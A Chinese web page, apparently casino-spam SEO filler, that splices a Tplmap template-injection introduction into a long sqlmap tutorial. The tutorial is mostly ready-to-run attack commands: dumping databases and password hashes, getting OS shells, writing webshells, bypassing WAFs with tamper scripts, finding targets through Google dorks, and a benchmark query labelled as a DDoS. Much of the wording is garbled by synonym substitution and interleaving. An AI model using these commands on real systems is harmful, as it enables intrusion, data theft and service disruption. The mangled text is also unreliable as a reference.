澳门威尼斯赌场


忘不了的乡愁,未有U盘怎么设置当贝商场的五个办法

残疾人机轻轨专用标记,酒后驾驶扣拾1分

围观服务器端模板注入漏洞的开源工具,1一种广泛SQLMAP使用办法详解

原标题:Tplmap – 扫描服务器端模板注入漏洞的开源工具

sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,3个sqlmap就足足用了,只要你用的熟,秒杀各样工具,只是1个便捷性难点,sql注入另一方面即便手工业党了,这些就另当别论了。

1、基本知识

 

Tplmap是一个python工具,能够因而选拔沙箱转义本事找到代码注入和劳务器端模板注入(SSTI)漏洞。该工具可以在很多模板引擎中央银行使SSTI来访问目标文件或操作系统。一些接受帮衬助的沙盘引擎包含PHP(代码评估),Ruby(代码评估),Jave(代码评估),Python(代码评估),ERB,Jinja2和Tornado。该工具得以实施对那几个模板引擎的盲注入,并兼有实践远程命令的力量。

共计有1一种分布SQLmap使用办法:

介绍
sqlmap是1款命令行分界面开源的渗透测试工具(自动化sql注入),sqlmap能够自动化地侦测和执行SQL注入攻击以及渗透数据库服务器。sqlmap配有无往不胜的侦测引擎,适用于高端渗透测试用户,不仅能够获得不一致数据库的螺纹新闻,还足以从数据库中领到数据,此外仍是可以够够管理潜在的文件系统以及通过数量连接实施系统命令。

Sqlmap:

  • 一般注入流程:
  • sqlmap -u “www.ONDragon.com/ONDragon?id=1” –dbs   查看全部数据库

    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-db 查看当前数据库
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --user       查看数据库用户名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --current-user  查看当前用户名 
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --is-dba     判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" –privileges  判断权限
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --passwords  枚举密码哈希
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" --tables -D database'name    获取数据库的表名
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name --columns   获取数据库对应表的字段
    
    sqlmap -u "www.ONDragon.com/ONDragon?id=1" -D database'name -T table'name -C column'name --dump  获取数据库对应表的字段的值   --dump-all  获取所有内容
    
  • -u (get型注入)

    sqlmap -u “www.ONDragon.com/?ONDragon=1”

  • –data (post型注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –data=”user=admin&pass=pass”
    sqlmap -r requests.txt 读取http包实行活动post注入(也能够进入http底部的轻松地点注入,只要在注入地方投入 * 即可)
    sqlmap “www.ONDragon.com” –forms

  • –coockie (cookie注入)

    sqlmap -u “www.ONDragon.com/ONDragon” –cookie=”user=admin&pass=pass” –level 2 (level 大于2就行)

  • –batch
    (自动采纳sqlmap暗中认可选项)

  • -p  (参数选用)

    sqlmap -u “www.ONDragon.com” –forms -p admin

1.ACCESS数据库:

sqlmap.py -u “url”
/*-u为健康扫描参数*/

sqlmap.py -u “url” –tables
/*–tables拆数据库表*/

sqlmap.py -u “url” –columns -T
“要拆的表名”/*列出钦定表名*/

sqlmap.py -u “url” –dump -T “要拆的表名”-C
“要拆的字段名” /*–dump为拆毁字段名会保存在sqlmap/output目录下*/

2.MYSQL数据库:

sqlmap.py -u “url” /*举目四望注入点*/

sqlmap.py -u “url” –dbs
/*列出全部数据库*/

sqlmap.py -u “url” –current-db
/*列出方今数据库*/

sqlmap.py -u “url” –current-user
/*列出当下用户*/

sqlmap.py -u “url” –tables -D
“当前多少库名” /*拆除当前数量库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前数据库名” /*拆解钦命表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

3.SQLSERVER数据库:

sqlmap.py -u “url” /*举目四望注入点*/

sqlmap.py -u “url” –dbs
/*列出全体数据库*/

sqlmap.py -u “url” –current-db
/*列出当下数据库*/

sqlmap.py -u “url” –current-user
/*列出目前用户*/

sqlmap.py -u “url” –tables -D
“当前数码库名” /*拆迁当前数据库表*/

sqlmap.py -u “url” –columns -T
“要拆得的表名” -D “当前多少库名” /*拆除内定表字段名*/

sqlmap.py -u “url” –dump -C “字段名” -T
“表名” -D “当前数据库”

SQLSE本田UR-VVERubicon操作和MYSQL是同等的!!!常见的两种数据库!!!

4.COOKIE注入:

sqlmap.py -u
“www.xxx.com/asp也许www.xxx.com/php” –cookie “参数名如id=1” –level
2/*level为进步权限*/

怎么着数据库就依据上面的数据库加上cookie语句拆解就行了

5.POST注入:

抓包保存到SQLMAP目录下.txt的文书然后输入指令sqlmap.py
-r xxx.txt /*xxx.txt为保存包文件的文件名”

sqlmap.py -u “url” –data “POST参数”

6.执行shell命令:

sqlmap.py -u “url” –os-cmd=”net user”
/*执行net user命令*/

sqlmap.py -u “url” –os-shell
/*系统相互的shell*/

7.注入HTTP请求 :

sqlmap.py -r xxx.txt –dbs
/*xxx.txt内容为HTTP请求*/

八.绕过WAF的tamper插件使用:

sqlmap.py -u “url” –tamper “xxx.py”

澳门威尼斯赌场官网 ,sqlmap.py -u “url” –tamper=”xxx.py”

有关tamper脚本详细表达在本博客中有,链接为:

玖.将注入语句插入到钦命地点:

sqlmap.py -u
“url(www.xxx.com/id/1*.html)” –dbs

些微网址是行使伪静态的页面使用SQLMAP的平凡注入是格外的,所以SQLMAP提供了”*”参数将SQL语句插入钦赐地方,一般用于伪静态注入。

在利用HTTP注入时选用-r参数也能够一贯在文件中加多*号

10.延时注入:

sqlmap –dbs -u “url” –delay 0.5
/*延时0.5秒*/

sqlmap –dbs -u “url” –safe-freq
/*请求2次*/

1一.施用谷歌(谷歌)语法找出注入(谷歌(Google)hack):

sqlmap.py -g “inurl:asp?id=1”
/*””内为寻找语法,如:inurl,intitle,site,filetype等等。


Options(选项):

–version 呈现程序的版本号并退出

-h, –help 突显此支持音信并脱离

-v VE奥迪Q叁DOSS 详细等第:0-陆(默以为1)

Target(目标):

以下至少需求设置个中一个取舍,设置目标U帕杰罗L。

-d DIRECT 直接连接到数据库。

-u URL, –url=URL 目标URL。

-l LIST
从Burp或WebScarab代理的日志中分析目标。

-r REQUESTFILE
从2个文书中载入HTTP请求。

-g GOOGLEDO大切诺基K 管理Googledork的结果作为靶子U奥迪Q三L。

-c CONFIGFILE
从INI配置文件中加载选项。

Request(请求):

那些选拔能够用来钦点怎么样连接到目的U凯雷德L。

–data=DATA 通过POST发送的数量字符串

–cookie=COOKIE HTTP Cookie头

–cookie-urlencode U昂科雷L
编码生成的cookie注入

–drop-set-cookie 忽略响应的Set –
库克ie头消息

–user-agent=AGENT 指定 HTTP User –
Agent头

–random-agent 使用随机选定的HTTP User –
Agent头

–referer=REFERER 指定 HTTP
Referer头

–headers=HEADE福特ExplorerS
换行分开,出席别的的HTTP头

–auth-type=ATYPE
HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)

–auth-cred=ACRED
HTTP身份验证凭据(用户名:密码)

–auth-cert=ACERT
HTTP认证证书(key_file,cert_file)

–proxy=PROXY
使用HTTP代理连接到对象UKoleosL

–proxy-cred=PCRED
HTTP代理身份验证凭据(用户名:密码)

–ignore-proxy 忽略系统默许的HTTP代理

–delay=DELAY
在每一种HTTP请求之间的延迟时间,单位为秒

–timeout=TIMEOUT
等待连接超时的岁月(默认为30秒)

–retries=RETLX570IES
连接超时后再也连接的时刻(暗中同意叁)

–scope=SCOPE
从所提供的代理日志中过滤器目标的正则表明式

–safe-url=SAFU宝马X5L
在测试进度中平常访问的url地址

–safe-freq=SAFREQ
三回访问之间测试请求,给出安全的U锐界L

Optimization(优化):

那几个选取可用于优化SqlMap的习性。

-o 开启全部优化开关

–predict-output 预测常见的查询输出

–keep-alive 使用持久的HTTP(S)连接

–null-connection
从没有实际的HTTP响应体中搜寻页面长度

–threads=THREADS
最大的HTTP(S)请求并发量(默感到壹)

Injection(注入):

这么些接纳能够用来钦命测试哪些参数,
提供自定义的流入payloads和可选篡改脚本。

-p TESTPARAMETE智跑 可测试的参数(S)

–dbms=DBMS 强制后端的DBMS为此值

–os=OS
强制后端的DBMS操作系统为那么些值

–prefix=PREFIX
注入payload字符串前缀

–suffix=SUFFIX
注入payload字符串后缀

–tamper=TAMPEPRADO使用给定的脚本(S)篡改注入数据

Detection(检测):

那么些选取能够用来内定在SQL盲注时怎样分析和相比较HTTP响应页面包车型大巴剧情。

–level=LEVEL
实践测试的品级(壹-五,私下认可为一)

–risk=HummerH二ISK
实行测试的风险(0-叁,暗许为一)

–string=ST奥迪Q7ING
查询时有效时在页面相称字符串

–regexp=REGEXP
查询时有效时在页面相配正则表明式

–text-only 仅依照在文书内容相比较网页

Techniques(技巧):

这么些选择可用来调治具体的SQL注入测试。

–technique=TECH
SQL注入才能测试(私下认可BEUST)

–time-sec=TIMESEC
DBMS响应的延迟时间(默以为伍秒)

–union-cols=UCOLS
定列范围用于测试UNION查询注入

–union-char=UCHA普拉多用于暴力猜解列数的字符

Fingerprint(指纹):

-f, –fingerprint
推行检查普及的DBMS版本指纹

Enumeration(枚举):

那一个选拔能够用来列举后端数据库管理类其余音信、表中的构造和数据。其余,您还是可以运转您本身

的SQL语句。

-b, –banner
检索数据库管理种类的标记

–current-user
检索数据库管理连串当下用户

–current-db
检索数据库管理种类当下数据库

–is-dba 检查实验DBMS当前用户是还是不是DBA

–users 枚举数据库管理系列用户

–passwords
枚举数据库管理体系用户密码哈希

–privileges
枚举数据库管理连串用户的权力

–roles 枚举数据库管理体系用户的剧中人物

–dbs 枚举数据库管理种类数据库

–tables 枚举的DBMS数据库中的表

–columns 枚举DBMS数据库表列

–dump
转储数据库管理类其他数据库中的表项

–dump-all
转储全体的DBMS数据库表中的条文

–search
找寻列(S),表(S)和/或数据库名称(S)

-D DB 要实行枚举的数目库名

-T TBL 要拓展枚举的数额库表

围观服务器端模板注入漏洞的开源工具,1一种广泛SQLMAP使用办法详解。-C COL 要开始展览枚举的多寡库列

-U USE纳瓦拉 用来进行枚举的数据库用户

–exclude-sysdbs
枚举表时排除系统数据库

–start=LIMITSTART
第多少个查询输出进入检索

–stop=LIMITSTOP
最后查询的出口进入检索

–first=FIGL450STCHARAV4第三个查询输出字的字符检索

–last=LASTCHACR-V最终查询的出口字字符检索

–sql-query=QUE景逸SUVY 要实行的SQL语句

–sql-shell 提醒交互式SQL的shell

Brute force(蛮力):

这么些选用能够被用来运行蛮力检查。

–common-tables 检查存在共同表

–common-columns 检查存在共同列

User-defined function
injection(用户自定义函数注入):

这一个接纳能够用来创立用户自定义函数。

–udf-inject 注入用户自定义函数

–shared-lib=SHLIB 共享库的本土路线

File system
access(访问文件系统):

那些选用能够被用来访问后端数据库管理类别的最底层文件系统。

–file-read=LX570FILE
从后端的数据库处理系统文件系统读取文件

–file-write=WFILE
编辑后端的数据库管理系统文件系统上的地头文件

–file-dest=DFILE
后端的数据库管理连串写入文件的相对路线

Operating system
access(操作系统访问):

这一个选取能够用于访问后端数据库管理连串的平底操作系统。

 

–os-cmd=OSCMD 施行操作系统命令

–os-shell 交互式的操作系统的shell

–os-pwn 获取一个OOB
shell,meterpreter或VNC

–os-smbrelay 1键获取四个OOB
shell,meterpreter或VNC

–os-bof 存款和储蓄进程缓冲区溢出利用

–priv-esc 数据库进度用户权限提高

–msf-path=MSFPATH Metasploit Framework本地的装置路线

–tmp-path=TMPPATH
远程一时半刻文件目录的绝对路线

Windows注册表访问:

这几个选取可以被用于访问后端数据库管理体系Windows注册表。

–reg-read 读2个Windows注册表项值

–reg-add
写3个Windows注册表项值数据

–reg-del 删除Windows注册表键值

–reg-key=REGKEY Windows注册表键

–reg-value=REGVAL Windows注册表项值

–reg-data=REGDATA
Windows登记表键值多少

–reg-type=REGTYPE
Windows注册表项值类型

General(一般):

这么些采纳能够用来设置有个别一般的行事参数。

-t TRAFFICFILE
记录全数HTTP流量到一个文书文件中

-s SESSIONFILE
保存和还原检索会话文件的保有数据

–flush-session
刷新当前目标的对话文件

–fresh-queries
忽略在对话文件中存款和储蓄的查询结果

–eta 显示各类输出的推测达到时刻

–update 更新SqlMap

–save file保存选项到INI配置文件

–batch
从不询问用户输入,使用全体暗许配置。

Miscellaneous(杂项):

–beep 发掘SQL注入时提示

–check-payload
IDS对流入payloads的检查测试测试

–cleanup
SqlMap具体的UDF和表清理DBMS

–forms 对目的U翼虎L的解析和测试格局

–gpage=GOOGLEPAGE
从内定的页码使用谷歌(谷歌(Google))dork结果

–page-rank 谷歌dork结果突显网页排行(P福睿斯)

–parse-errors
从响应页面解析数据库管理类其余失实音讯

–replicate
复制转储的多少到四个sqlite三数据库

–tor 使用暗中同意的Tor(比达尔ia/ Privoxy/
Polipo)代理地址

–wizard 给初级用户的大致向导界面

安装Tplmap

一、SQLMAP用于Access数据库注入

windows下安装:

澳门威尼斯赌场官网 1

(一) 猜解是或不是能注入

先安装python情状,再将sqlmap解压到python文件夹中,新建sqlmap.bat,写入cmd.exe(在这几个目录下张开cmd)

能够经过动用以下github链接从github存款和储蓄Cook隆该工具来设置Tplmap。

win: python sqlmap.py -u
“http://www.xxx.com/en/CompHonorBig.asp?id=7”

sqlmap选择四种越发的SQL注入技艺,分别是:

git clone

Linux : .lmap.py -u
“http://www.xxx.com/en/CompHonorBig.asp?id=7”

0)基于布尔bool的盲注,即能够依附再次回到页面测量标准真假的流入

成功安装后,将引得路线改动为tplmap安装文件以运维tplmap.py。

(2) 猜解表

①)基于时间time的盲注,即不可能依附页面重临内容决断任何音讯,用标准化语句查看时间推迟

测试Web应用程序中的漏洞

win: python sqlmap.py -u
“http://www.xxx.com/en/CompHonorBig.asp?id=7”–tables

贰)语句是或不是进行(即页面重临时间是或不是追加)来剖断

Tplmap不仅使用了文件系统的狐狸尾巴,而且还持有应用分裂参数访问底层操作系统的工夫。以下显示屏截图显示了可用以访问操作系统的不及参数选项

Linux: .lmap.py -u
“http://www.xxx.com/en/CompHonorBig.asp?id=7”–tables

3)基于报错error注入,即页面会再次来到错误消息,恐怕把注入的话语的结果直接重回在页面中

澳门威尼斯赌场官网 2

(三) 遵照猜解的表打开猜镇痉的字段(假设通过二获得了admin那么些表)

四)联合查询union注入,能够行使union的气象下的流入

以下命令可用以测试对象UCRUISERL中的易受攻击的参数。

win: python sqlmap.py -u
“http://www.xxx.com/en/CompHonorBig.asp?id=7”–columns
-T admin

5)堆查询注入,能够同时进行多条语句的施行时的流入

./tplmap.py -u <‘目的网址’>

Linux: .lmap.py -u
“http://www.xxx.com/en/CompHonorBig.asp?id=7”–columns
-T admin

2、两种请求类型的注入探测

实施该命令后,该工具会针对多少个插件测试对象U科雷傲L以找寻代码注入机会。

(4) 依据字段猜解内容(假设通过三获得字段为username和password)

GET格局的SQL注入检验 :sqlmap.py -u “URL”

澳门威尼斯赌场官网 3

win: python sqlmap.py -u
“http://www.xxx.com/en/CompHonorBig.asp?id=7”–dump
-T admin -C “username,password”

POST格局的SQL注入检查评定:sqlmap.py -u “URL” –data “post数据”

要是发掘漏洞,该工具将出口有关目的中或许注入点的详细新闻。那一个包括GET参数值(无论是id照旧名称),模板引擎(比方Tornado),OS(举例Linux)和注入技能(举例渲染,盲)。

Linux: .lmap.py -u
“http://www.xxx.com/en/CompHonorBig.asp?id=7”–dump
-T admin -C

Cookie形式的SQL注入检查实验:sqlmap.py -u “URL” –cookie “cookie数据”

澳门威尼斯赌场官网 4

“username,Bpassword”

三、获取数据库相关新闻

对于易受攻击的靶子操作系统,能够运用前边提到的中间三个参数重国民党的新生活运动行tplmap命令。比如,大家能够透过以下措施将-os
-shell选项与tplmap命令一同行使。

二、SQLMAP用于Cookie注入

1)得到数据库的数据库类型以及版本

./tplmap.py –os-shell -u <‘目标网站’>

(1) cookie注入,猜解表

两种普及数据库类型:Microsoft SQL Server、Mysql、Orcle、PostgreSQL

-os -shell选项在目的操作系统上运维伪终端以实行所需的代码。

win : python sqlmap.py -u
“http://www.xxx.org/jsj/shownews.asp”–cookie
“id=31” –table –level 2

直接使用注入格局的检查测试语法就能够

文章出处:latesthackingnews回去微博,查看越来越多

(二) 猜解字段,(通过一的表猜解字段,假如表为admin)

各队的数据库结构(Microsoft Access唯有二个库)

主编:

win :python sqlmap.py -u
“http://www.xxx.org/jsj/shownews.asp”–cookie
“id=31” –columns -T

2)拿到当前网址所选取的数额库名和用户名

admin –level 2

获取当前数据库名 :行使参数 –current-db

(三) 猜解内容

获得用户名:利用参数–current-user

win :python sqlmap.py -u
“http://www.xxx.org/jsj/shownews.asp”–cookie
“id=31” –dump -T

4、获得数据量和用户权限

admin -C “username,password” –level 2

获得数据库的数据量: –count  -D “当前利用的数额库名”

叁、SQLMAP用于mysql中DDOS攻击(一) 获取多个Shell

用户权限:参数–privileges可以查阅用户权限

win:

(microsoft sql server最高权力用户名:sa
mysql最高权力用户名:root

python sqlmap.py
-uhttp://192.168.159.1/news.php?id=1–sql-shell

伍、MySQL数据库注入

Linux:

MySQL数据库结构

sqlmap
-uhttp://192.168.159.1/news.php?id=1–sql-shell

一)领悟数据库结构 

(2) 输入实践语句达成DDOS攻击

澳门威尼斯赌场官网 5

select
benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

2)顺推下去

四、SQLMAP用于mysql注入

澳门威尼斯赌场官网 6

(一) 查找数据库

陆、管理自身的数据库

python sqlmap.py -u
“http://www.xxx.com/link.php?id=321”–dbs

数据库如何随时去老是

(二) 通过第三步的数据库查找表(假使数据库名叫dataname)

先下载pymysql,解压,cmd切换目录,setup.py install,用言语sqlmap.py
-d “mysql://用户名:密码@地址:端口/数据库”

python sqlmap.py -u
“http://www.xxx.com/link.php?id=321”-D
dataname –tables

连年上后用–sql-shell进行sql实施处理

(叁) 通过第22中学的表得出列名(借使表为table_name)

七、延时注入的吸引力

python sqlmap.py -u
“http://www.xxx.com/link.php?id=321”-D
dataname -T table_name –columns

延时注入的应用情状

(4) 获取字段的值(如果扫描出id,user,password字段)

澳门威尼斯赌场官网 7

python sqlmap.py -u
“http://www.xxx.com/link.php?id=321”-D
dataname -T table_name -C

开始展览延时注入:选用参数–delay加数字值  或许 -safe-freq

“id,user,password” –dump

八、交互式命令施行和写webshell

五、SQLMAP中post登入框注入

哪些是交互式:操作人士和体系(注入点网址)的交互          
(注入点的用户权限必须为最高权力)

(一) 个中的search-test.txt是透过抓包工具burp
suite抓到的包并把数量保存为这些txt文件大家在选取Sqlmap举行post型注入时,平日会产出请求遗漏导致注入失利的景况。那里享受八个小技能,即构成burpsuite来行使sqlmap,用那种艺术开始展览post注入测试会改良确,操作起来也格外轻易。

sqlmap进行指令施行(提权):

  1. 浏览器展开目的地址http:// www.xxx.com /Login.asp

  2. 布局burp代理(1贰7.0.0.1:8080)以阻滞请求

  3. 点击login表单的submit按钮

  4. 那儿候Burp会拦截到了大家的记名POST请求

  5. 把那一个post请求复制为txt, 作者那命名称为search-test.txt
    然后把它放至sqlmap目录下

  6. 运营sqlmap并行使如下命令:

     
3个参数不难解决:–os-cmd=“命令”(注目的在于选择交互式参数时要知道网址的相对路线,相对路线是从盘符初始的)使用参数后直接回车就能够,当我们进行的时候sqlmap会默认生成3个文书,执行完钦命命令后会自动删除。

./sqlmap.py -r search-test.txt -p tfUPass

写webshell:使用参数–os-shell,直接回车,自动生成的文本关闭sqlmap后就会活动删除。

此间参数-r 是让sqlmap加载大家的post请求rsearch-test.txt,而-p
大家应该相比较明白,内定注入用的参数。

玖、Tamper脚本的介绍和利用

注入点:http://testasp.vulnweb.com/Login.asp

what  is
tamper:sqlmap目录下的tamper目录,目录里面包车型客车脚本都有分裂的法力来补助大家应用sqlmap举办尖端的sql注入测试,如:绕过waf。

三种注入格局:./sqlmap.py -r search-test.txt -p tfUPass

小规模试制tamper脚本:测试二个流入漏洞时,常规的法子11分(and推断),用大小写绕过(大小写绕过手工业劳动),用tamper脚本!!!语法:–tampe=“脚本名字”

(贰) 自动的搜寻

怀有Tamper脚本的用法!!!

sqlmap
-uhttp://testasp.vulnweb.com/Login.asp–forms

十、本地写入webshell

(3) 钦定参数找出

何以是本地写入:本地是在你和煦的Computer上,别人是造访不到的;而远程是在你和谐的网址上,外人也足以访问的到。

sqlmap
-uhttp://testasp.vulnweb.com/Login.asp–data
“tfUName=321&tfUPass=321”

地面写入webshell:首先你须求3个文件,在sqlmap目录下新建1个索引(mst),在目录(mst)下创办协调想要上传文件(如:mst.txt);其次你须要四个参数(注入点也是必须须要最高权力):–file-write
“./mst/mst.txt”(当半夏件的地址)、–file-dest
“d:/www/一.html”(目的文件的地方)。

6、SQLMAP中谷歌搜索注入

1一、批量检查评定注入漏洞

inurl后边的言语是由自身定的

批量:在sqlmap中繁多链接批量检查评定sql注入

流入进度中一旦选y是流入,如若不是选n

批量检查评定的办法:一个语法 -m “路线”

sqlmap -g inurl:php?id=

构成burpsuit举办批量:首先要安顿burpsuit下记录全体的request记录,并保留在钦命文件夹。其次实践命令:sqlmap.py
-l burp.log –batch -smart
,就能够对burp.log中保存的具备request举行注入扫描(batch:会活动选用yes,smart启发式火速决断节约时间)。

七、SQLMAP中的请求延迟

壹部分小语法:探测阶段 –level=(壹-5)  #要实施的测试水平品级,默许为一

参数 –delay –safe-freq

                      风险等第 –risk=(0-叁)
#测试试行的高危机等第,默以为1

python sqlmap.py –dbs -u “http://xxx.cn/index.php/Index/ …
ot%3B–delay
1

澳门威尼斯赌场官网 8

python sqlmap.py –dbs -u “http://xxx.cn/index.php/Index/ …
ot%3B–safe-freq
3

1二、sqlmap学习注入才干

参数

摸底sqlmap目录结构:

八、SQLMAP绕过WAF防火墙

澳门威尼斯赌场官网 9

注入点:http://192.168.159.1/news.php?id=1

        
xml目录能够学到注入才具:里面有2个payloads(都以sqlmap注入检查实验的负载文件)

sqlmap
-uhttp://192.168.159.1/news.php?id=1-v
3 –dbs –batch –tamper “space2morehash.py”

除此之外能够通过载荷文件去读书sqlmap注入之外,还足以经过三个小参数:-v
数字

space二morehash.py中能够轮换space二hash.py或然base6四encode.py可能charencode.py

澳门威尼斯赌场官网 10

都以编码情势

还可通过抓包学习:3个参数
–proxy=(那里的代理服务器便是burpsuit相对应监听的)

space2hash.py base64encode.py charencode.py

九、SQLMAP查看权限

sqlmap
-uhttp://192.168.159.1/news.php?id=1–privileges

十、SQLMAP伪静态注入(1) 查找数据库

python sqlmap.py -u “http://xxx.cn/index.php/Index/ …
ot%3B–dbs

(二) 通过第11中学的数据库查找对应的表 (借使通过壹,获得的是dataname)

python sqlmap.py -u “http://xxx.cn/index.php/Index/ …
ot%3B-D
dataname –tables

(③) 通过第22中学的数据表获得字段(若是获得的是tablename表)

python sqlmap.py -u “http://xxx.cn/index.php/Index/ …
ot%3B-D
dataname -T

tablename –columns

(四) 通过3获得字段值(假诺从三中赚取字段id,password)

python sqlmap.py -u “http://xxx.cn/index.php/Index/ …
ot%3B-D
dataname -T

tablename -C “password” –dump

十一、SQLMAP注入点实践命令与彼此写shell

(1)
注入点:http://192.168.159.1/news.php?id=1

此间接选举用的是Linux系统

sqlmap
-uhttp://192.168.159.1/news.php?id=1–os-cmd=ipconfig

出现语言的选项依据实际的测试网站选用语言

钦赐目标站点D:/www/

(2) 获取Shell

sqlmap
-uhttp://192.168.159.1/news.php?id=1–os-shell

并发语言的抉择依据实际的测试网址精选语言

点名目的站点D:/www/

输入ipconfig/all

创办用户和删除用户

壹旦权力丰裕大,你能够输入使用其它命令。

别的命令参考上边:

从数据库中查找字段

sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C
admin,password

在dedecms数据库中检索字段admin大概password。

读取与写入文件

先是找供给网址的情理路线,其次需求有可写或可读权限。

–file-read=OdysseyFILE 从后端的数据库管理系统文件系统读取文件 (物理路线)

–file-write=WFILE 编辑后端的数据库处理系统文件系统上的地面文件 (mssql
xp_shell)

–file-dest=DFILE 后端的数据库管理系列写入文件的相对路线

#示例:[

sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest
“e:\php\htdocs\dvwa\inc\include\1.php” –file-write
“f:\webshell\1112.php”

使用shell命令:

sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell

接下去钦定网址可写目录:

“E:\php\htdocs\dvwa”

#注:mysql不帮衬列目录,仅支持读取单个文件。sqlserver能够列目录,无法读写文件,但须要2个(xp_dirtree函数)

sqlmap详细命令:

-is-dba 当前用户权限(是还是不是为root权限)

-dbs 全体数据库

-current-db 网址当前数据库

-users 全体数据库用户

-current-user 当前数据库用户

-random-agent 构造随机user-agent

-passwords 数据库密码

-proxyhttp://local:8080–threads
十 (能够自定义线程加快) 代理

-time-sec=TIMESEC DBMS响应的延迟时间(默以为五秒)

Options(选项):

-version 展现程序的版本号并退出

-h, –help 突显此援救音讯并退出

-v VERURBANEASportageS 详细等第:0-陆(默以为一)

Target(目标):

以下至少须求安装在那之中3个挑选,设置目的U奥迪Q5L。

-d DIRECT 间接连接到数据库。

-u URL, –url=URL 目标URL。

-l LIST 从Burp或WebScarab代理的日记中剖析目的。

-r REQUESTFILE 从一个文本中载入HTTP请求。

-g GOOGLEDO福睿斯K 处理谷歌(Google) dork的结果作为靶子UKoleosL。

-c CONFIGFILE 从INI配置文件中加载选项。

Request(请求):

那几个选用能够用来钦点如何连接到对象U智跑L。

-data=DATA 通过POST发送的数额字符串

-cookie=COOKIE HTTP Cookie头

-cookie-urlencode UCR-VL 编码生成的cookie注入

-drop-set-cookie 忽略响应的Set – Cookie头音信

-user-agent=AGENT 指定 HTTP User – Agent头

-random-agent 使用随机选定的HTTP User – Agent头

-referer=REFERER 指定 HTTP Referer头

-headers=HEADE昂科雷S 换行分开,到场别的的HTTP头

-auth-type=ATYPE HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or
NTLM)

-auth-cred=ACRED HTTP身份验证凭据(用户名:密码)

-auth-cert=ACERT HTTP认证证书(key_file,cert_file)

-proxy=PROXY 使用HTTP代理连接到对象U本田CR-VL

-proxy-cred=PCRED HTTP代理身份验证凭据(用户名:密码)

-ignore-proxy 忽略系统默许的HTTP代理

-delay=DELAY 在每种HTTP请求之间的延迟时间,单位为秒

-timeout=TIMEOUT 等待连接超时的时光(默以为30秒)

-retries=RET汉兰达IES 连接超时后重新连接的年月(暗中认可三)

-scope=SCOPE 从所提供的代办日志中过滤器目标的正则表明式

-safe-url=SAFUEvoqueL 在测试进度中时时访问的url地址

-safe-freq=SAFREQ 三次访问之间测试请求,给出安全的ULX570L

Enumeration(枚举):

这个采纳能够用来列举后端数据库管理类别的消息、表中的协会和数量。此外,您还足以运作您本人的SQL语句。

-b, –banner 检索数据库管理类别的标志

-current-user 检索数据库管理种类当下用户

-current-db 检索数据库管理种类当下数据库

-is-dba 检查评定DBMS当前用户是或不是DBA

-users 枚举数据库管理连串用户

-passwords 枚举数据库管理体系用户密码哈希

-privileges 枚举数据库管理体系用户的权柄

-roles 枚举数据库管理种类用户的角色

-dbs 枚举数据库管理种类数据库

-D DBname 要开始展览枚举的内定数量库名

-T TBLname 要进行枚举的钦定数量库表(如:-T tablename –columns)

-tables 枚举的DBMS数据库中的表

-columns 枚举DBMS数据库表列

-dump 转储数据库处理种类的数据库中的表项

-dump-all 转储全体的DBMS数据库表中的条条框框

-search 寻觅列(S),表(S)和/或数据库名称(S)

-C COL 要拓展枚举的数目库列

-U USE智跑 用来进展枚举的数据库用户

-exclude-sysdbs 枚举表时排除系统数据库

-start=LIMITSTART 先是个查询输出进入检索

-stop=LIMITSTOP 最后查询的出口进入检索

-first=FISportageSTCHA福特Explorer 先是个查询输出字的字符检索

-last=LASTCHA宝马X叁 最终查询的输出字字符检索

-sql-query=QUE索罗德Y 要实行的SQL语句

-sql-shell 提醒交互式SQL的shell

Optimization(优化):

这个选拔可用于优化SqlMap的属性。

-o 开启全部优化按键

–predict-output 预测常见的查询输出

–keep-alive 使用持久的HTTP(S)连接

–null-connection 从不曾实际的HTTP响应体中查找页面长度

–threads=THREADS 最大的HTTP(S)请求并发量(默以为一)

Injection(注入):

这么些选取能够用来内定测试哪些参数,
提供自定义的流入payloads和可选篡改脚本。

-p TESTPARAMETE汉兰达 可测试的参数(S)

–dbms=DBMS 强制后端的DBMS为此值

–os=OS 强制后端的DBMS操作系统为这么些值

–prefix=PREFIX 注入payload字符串前缀

–suffix=SUFFIX 注入payload字符串后缀

–tamper=TAMPEXC60 使用给定的台本(S)篡改注入数据

Detection(检测):

这个选取能够用来内定在SQL盲注时怎么样分析和比较HTTP响应页面包车型地铁内容。

–level=LEVEL 实施测试的阶段(1-5,默感觉壹)

–risk=奥迪Q3ISK 试行测试的风险(0-三,默认为1)

–string=STTiguanING 查询时有效时在页面相称字符串

–regexp=REGEXP 查询时有效时在页面相称正则表明式

–text-only 仅依照在文书内容比较网页

Techniques(本领):这个选拔可用于调节具体的SQL注入测试。

–technique=TECH SQL注入本事测试(暗中认可BEUST)

–time-sec=TIMESEC DBMS响应的延迟时间(默感到5秒)

–union-cols=UCOLS 定列范围用于测试UNION查询注入

–union-char=UCHALX570 用于暴力猜解列数的字符

Fingerprint(指纹):-f, –fingerprint 施行检查分布的DBMS版本指纹

Brute force(蛮力):

那一个选用能够被用来运维蛮力检查。

–common-tables 检查存在共同表

–common-columns 检查存在共同列

User-defined function injection(用户自定义函数注入):

这个采取能够用来创制用户自定义函数。

–udf-inject 注入用户自定义函数

–shared-lib=SHLIB 共享库的地面路线

File system access(访问文件系统):

这么些选用能够被用于访问后端数据库管理类别的底层文件系统。

–file-read=奥迪Q7FILE 从后端的数据库管理系统文件系统读取文件

–file-write=WFILE 编辑后端的数据库管理系统文件系统上的当和姑件

–file-dest=DFILE 后端的数据库管理类别写入文件的相对路线

Operating system access(操作系统访问):

那些选择能够用来访问后端数据库管理类其他最底层操作系统。

